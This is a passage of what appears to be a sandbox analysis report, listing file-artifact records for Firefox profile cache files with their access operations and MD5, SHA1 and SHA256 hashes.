"c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\e\\e9\\1a006d01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\E\\69\\885EEd01.4035", "hashes": [ { "md5_hash": "b629e0fa7fa712645a838eb680a00f54", "sha1_hash": "07592df7b300f9e05e977748eb25cb625eb70aa5", "sha256_hash": "0fc50308b8ebe93bc4822adcae20fbbe6a0be4985cd3784d583478f9b80801ef", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\e\\69\\885eed01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\E\\69\\885EEd01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\e\\69\\885eed01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\E\\57\\C6B34d01.4035", "hashes": [ { "md5_hash": "d4e02f6723499836062beba674331786", "sha1_hash": "49d58e85d7638d4e68938e224d61a0f72924e372", "sha256_hash": "09746b7908ca5861a694c6730821d16b3606c629d42c481f91c7efedfcf8d58c", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\e\\57\\c6b34d01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\E\\57\\C6B34d01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\e\\57\\c6b34d01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\E\\45\\C6466d01.4035", "hashes": [ { "md5_hash": "d495e926278f7b196a5e14864c3418af", "sha1_hash": "05127534a616516a43128d22ebdbcfa1c109e369", "sha256_hash": "4b2f2253c24fa2dacb710ffe4c6fe9066dfcd2d56fbf8e02e5e8cdf57ec95e3e", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\e\\45\\c6466d01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\E\\45\\C6466d01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\e\\45\\c6466d01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\D\\FE\\A0C36d01.4035", "hashes": [ { "md5_hash": "9264559a782a7368708dd64a6f507afb", "sha1_hash": "bf6e89779f39664fe7fc8ada358f2b1b7d915412", "sha256_hash": "2bdd7c1ca0173e2a0acb0aab3f720e20248319177c1561e31a4f6904fb043196", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\d\\fe\\a0c36d01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\D\\FE\\A0C36d01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\d\\fe\\a0c36d01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\D\\08\\71469d01.4035", "hashes": [ { "md5_hash": "6e5b1a664bd33e091a2e0c00f0a2df97", "sha1_hash": "8cb167c3f82b62fa754572405ce0d5b18b71b807", "sha256_hash": "e7e8eeec361adf0f27c1057a0b30e6404ba4b135bb13c5be16ffd76c407350f9", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\d\\08\\71469d01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\D\\08\\71469d01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\d\\08\\71469d01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\D\\07\\1F307d01.4035", "hashes": [ { "md5_hash": "543c1e2fd98388f52d7cfa913e30bd41", "sha1_hash": "c82baf8382879319fd85130244be94a176dd704d", "sha256_hash": "6874c7992fe214bece34bf7dc2a89616dfb9ac6eca0eba9de31723de4091ef65", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\d\\07\\1f307d01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\D\\07\\1F307d01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\d\\07\\1f307d01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\C\\7F\\996B5d01.4035", "hashes": [ { "md5_hash": "4c14934627de0c168f8dda751a517c96", "sha1_hash": "85043214226509e2cc390f087b09809f5c71774a", "sha256_hash": "f08a7a6bc5035c16013e3462163a008302135b4d70b024bd2c239cdad41b0475", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\c\\7f\\996b5d01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\C\\7F\\996B5d01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\c\\7f\\996b5d01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\C\\1F\\7ADBDd01.4035", "hashes": [ { "md5_hash": "490c13ea8221d569acf7030440a5877a", "sha1_hash": "802341d9a9854d16020509bc390dcd7cef806120", "sha256_hash": "2c846778e739462af23c221d55c0303d89f65c2c7a8cc36c0b2c18ba07606ad6", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\c\\1f\\7adbdd01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\C\\1F\\7ADBDd01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\c\\1f\\7adbdd01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\B\\E5\\9A8D1d01.4035", "hashes": [ { "md5_hash": "fbb484d90f8bb3d0f8d6754fbe0446cf", "sha1_hash": "00354876418ff01eef10b84416fe6a6420aa9f58", "sha256_hash": "0e27282a368801ab952b8e095d0e9ab5b7c2e88b6f54b51a6a2c5996a9a14cf8", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\b\\e5\\9a8d1d01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\B\\E5\\9A8D1d01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\b\\e5\\9a8d1d01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\B\\64\\37ABBd01.4035", "hashes": [ { "md5_hash": "0364fe0ee6a1533e68f3bb077a8a5b39", "sha1_hash": "92daa283b0dd48bf546cb4e8a3714c1d067d6d44", "sha256_hash": "dd93715b0d15e8250df269b01b04f635d7fd659a6bf83199bf1cc88aaba3ae15", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\b\\64\\37abbd01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\B\\64\\37ABBd01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\b\\64\\37abbd01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\A\\CE\\65483d01.4035", "hashes": [ { "md5_hash": "edd6be295507e9b1796bc0caa77f9d81", "sha1_hash": "7ad5c83785b116faf082294a75d8e38c8cf788e7", "sha256_hash": "45701e43c77e4cbd2c06cc36bd0a4678732e412130e51bd4db771585afb4d72a", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\a\\ce\\65483d01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\A\\CE\\65483d01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\a\\ce\\65483d01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\A\\AE\\CF1AEd01.4035", "hashes": [ { "md5_hash": "e91d487f1118a8526a1574b54372aacb", "sha1_hash": "8ebe20efc7b3deff8f39a7ee0b02e304b623d458", "sha256_hash": "581b2cd4c723bbfae4bde1cb85c1e0d80712706b84a5d55968b89f873d9b98a0", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\a\\ae\\cf1aed01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\A\\AE\\CF1AEd01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\a\\ae\\cf1aed01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\9\\FD\\57344d01.4035", "hashes": [ { "md5_hash": "09844b1d6c7d267f2d14b5cb31f0c6de", "sha1_hash": "f3d2f5bd0425a4a33da5c1fe52638776a9491984", "sha256_hash": "8ec7c1cbe6fcbb275f60c085e3400fe9d01eaebd9e4746b92ecf6c9371a507ec", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\9\\fd\\57344d01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\9\\FD\\57344d01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\9\\fd\\57344d01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\9\\E0\\F17B2d01.4035", "hashes": [ { "md5_hash": "54833d22ea4f562c702b49d22e42bab3", "sha1_hash": "75593b4332171edf57b17b8aeb27271b85225c0e", "sha256_hash": "cc211200681d38fbff07316a7f579db5d60ebb98bcf51bcd57c8e0b3975dcb30", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\9\\e0\\f17b2d01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\9\\E0\\F17B2d01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\9\\e0\\f17b2d01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\9\\C3\\6DBC9d01.4035", "hashes": [ { "md5_hash": "c1192cd23d6b2513bfecaff25bfa629a", "sha1_hash": "2eb3ac358a3416bd253b55fc0730265737266253", "sha256_hash": "6aa652b4556f10a09c99a136bcb8961f446b284a60e7c82dd9fb4db2a1e1f74f", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\9\\c3\\6dbc9d01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\9\\C3\\6DBC9d01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\9\\c3\\6dbc9d01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\9\\8D\\2B984d01.4035", "hashes": [ { "md5_hash": "934730c50bede06b9854a8eabe30a99e", "sha1_hash": "e30872953d21381f3cda0cd43e90ebab0fe44afd", "sha256_hash": "43f0dcb1e7717b5892359644c3525dcb1c821729dec55e638c99eba5c094036f", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\9\\8d\\2b984d01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\9\\8D\\2B984d01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\9\\8d\\2b984d01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\9\\49\\38779d01.4035", "hashes": [ { "md5_hash": "20cad58d2bf3603fee4bbe78a0b4d934", "sha1_hash": "76713825e00843b318e0081f5ec1cd42867bd5b7", "sha256_hash": "205de34bf5c1a6c64f1239c397ee89afc44799a039cae112dc5e6e9bc7116faf", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\9\\49\\38779d01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\9\\49\\38779d01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\9\\49\\38779d01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\9\\2C\\24B53d01.4035", "hashes": [ { "md5_hash": "914ad8365380b4ba14e6b59f146c938b", "sha1_hash": "a0cff935dce08552ec65e860027fd86bf24dbe20", "sha256_hash": "3baecc491eebe5c21f0466da81b7f9d86c3c2ebeb27e38e041fb352a5557c0f7", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\9\\2c\\24b53d01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\9\\2C\\24B53d01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\9\\2c\\24b53d01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\9\\10\\16A09d01.4035", "hashes": [ { "md5_hash": "07b994c0e6e3969a6f9306c05993d8a2", "sha1_hash": "9ccda6ff5b2f74348d124bf33c862e6313661c22", "sha256_hash": "5fef7a1b43f75feb78cabb625c2bcfa4ce03a8c0e3813501d5fef59d0273eabc", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\9\\10\\16a09d01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\9\\10\\16A09d01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\9\\10\\16a09d01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\8\\AE\\93407d01.4035", "hashes": [ { "md5_hash": "3f10828d89f11e9f574a93c26ae7a52e", "sha1_hash": "b21518131a31d6f579d04bd077d88e875dd3fbdb", "sha256_hash": "17095f46413455e61ee32b533212f40e30282f47f9eaf5ee97814f52ec0ee4cf", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\8\\ae\\93407d01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\8\\AE\\93407d01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\8\\ae\\93407d01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\8\\67\\68348d01.4035", "hashes": [ { "md5_hash": "e4c6eaef5d54c4937541a43a4bb2b5e9", "sha1_hash": "83813374d258cf2abf4a1f31e6a959040a258fea", "sha256_hash": "1e5acb0a106dcfd4a93d2e5c627b7cae608cf29c652c4f77536df32dcc9d7e1c", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\8\\67\\68348d01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\8\\67\\68348d01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\8\\67\\68348d01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\7\\26\\90EEBd01.4035", "hashes": [ { "md5_hash": "89ac43e65060e5acd25f44849813e572", "sha1_hash": "0eab4f17b992b72157d954bc10b3a0b92482b9fd", "sha256_hash": "e9634443ddfa834de2c38c55937420e3419acb7eabcf22c52b44e258477de1c7", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\7\\26\\90eebd01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\7\\26\\90EEBd01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\7\\26\\90eebd01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\5\\F1\\C8C27d01.4035", "hashes": [ { "md5_hash": "5f895fba2c0b4e908c031b45f6be3643", "sha1_hash": "a1bfd386e46df6da995e0244752f74eb6aa0a9e1", "sha256_hash": "4802e2864162788b66930bb748382adef8faf0c15ddacb74c5cd4ee33763caf5", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\5\\f1\\c8c27d01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\5\\F1\\C8C27d01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\5\\f1\\c8c27d01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\5\\1B\\2561Dd01.4035", "hashes": [ { "md5_hash": "cfc4ef74cc193a569041458ea1e7687f", "sha1_hash": "11edc6a6f811dcb5199393687998dfce79be8e49", "sha256_hash": "37f5b010f837e6d26fc54c38e3c0a848a9365c34bfedb12ec1000ff4f28faeaf", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\5\\1b\\2561dd01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\5\\1B\\2561Dd01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\5\\1b\\2561dd01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\4\\EE\\95599d01.4035", "hashes": [ { "md5_hash": "1ed06795e57dec8bb5ee5d25320f02dd", "sha1_hash": "a81309e45e73ff15806c6dd0e6f78c5e6d4a3823", "sha256_hash": "b60072c78f57b723476ea0821ad9edbd90e5f95ab2ae91c01bded9069c2f2091", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\4\\ee\\95599d01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\4\\EE\\95599d01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\4\\ee\\95599d01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\4\\20\\CFA2Fd01.4035", "hashes": [ { "md5_hash": "50e8e2fffb7089628d75cc669ec4509d", "sha1_hash": "fc0b322070b26869e019288cb18b21145dc7f29b", "sha256_hash": "2557474a1dcf1807d30ce768e9bcce2a10ae658f2f2ae18f2be062e57853e670", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\4\\20\\cfa2fd01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\4\\20\\CFA2Fd01", "hashes": [], "norm_filename": 